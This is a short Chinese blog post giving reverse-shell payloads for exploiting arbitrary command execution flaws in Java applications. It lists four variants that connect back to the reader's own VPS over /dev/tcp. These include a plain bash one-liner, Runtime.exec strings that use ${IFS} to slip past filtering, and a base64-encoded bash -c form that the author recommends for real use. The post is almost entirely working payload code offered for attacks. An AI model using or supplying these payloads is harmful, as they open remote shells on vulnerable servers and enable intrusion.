Java任意命令执行漏洞bash反弹shell Payload

通常1不能直接获取反弹Shell,实战中4很好用

1
bash -i >& /dev/tcp/你的vps ip/监听端口 0>&1 #大部分情况直接执行这个命令不能弹,用下面的
2
Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/监听端口<&1");
3
@java.lang.Runtime@getRuntime().exec('/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/监听端口<&1')
4
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i} #中间内容替换为1中的Base64
posted @   我超怕的  阅读(1485)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)
点击右上角即可分享
微信分享提示